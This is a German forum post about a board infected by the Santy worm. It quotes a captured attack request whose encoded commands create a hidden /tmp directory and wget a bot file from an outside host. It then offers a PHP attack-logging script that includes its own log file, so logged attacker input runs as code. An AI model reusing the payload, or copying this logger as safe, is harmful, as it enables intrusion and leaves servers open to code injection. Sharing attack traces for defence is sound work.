Have ich von nem santy befallenen board, der admin reagiert leider nicht - ist wohl n leeres testboard:
http://weblicious.com/
Der Wurm holt sich ein File von da, es ist in Perl:
http://weblicious.com/.notes/ssh2.htm
Die request_uri beim Versuch auf meinen Server war
/&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20 ... D%29.%2527\';
Wenn jemand Attacken mitloggen möchte soll er sich zwei Files ins befallene Dir stellen:
eine .htaccess:
Code: Alles auswählen
RewriteEngine on
RewriteCond %{REQUEST_URI} (.*)$
RewriteRule (.*)$ log.php?q=$1
Code: Alles auswählen
<?
$ip = $_SERVER['REMOTE_ADDR'];
$ts = time();
$uri = $_SERVER['REQUEST_URI'];
$filename = 'log.txt';
$somecontent = "$ts <a href=http://$ip>$ip</a> $uri <br/>\n";
if (is_writable($filename)) {
if (!$handle = fopen($filename, "a")) {
print "Kann die Datei $filename nicht öffnen";
exit;
}
if (!fwrite($handle, $somecontent)) {
print "Kann in die Datei $filename nicht schreiben";
exit;
}
fclose($handle);
} else {
print "Debug: datei log.txt ist nicht schreibbar";
}
include('log.txt');
?>
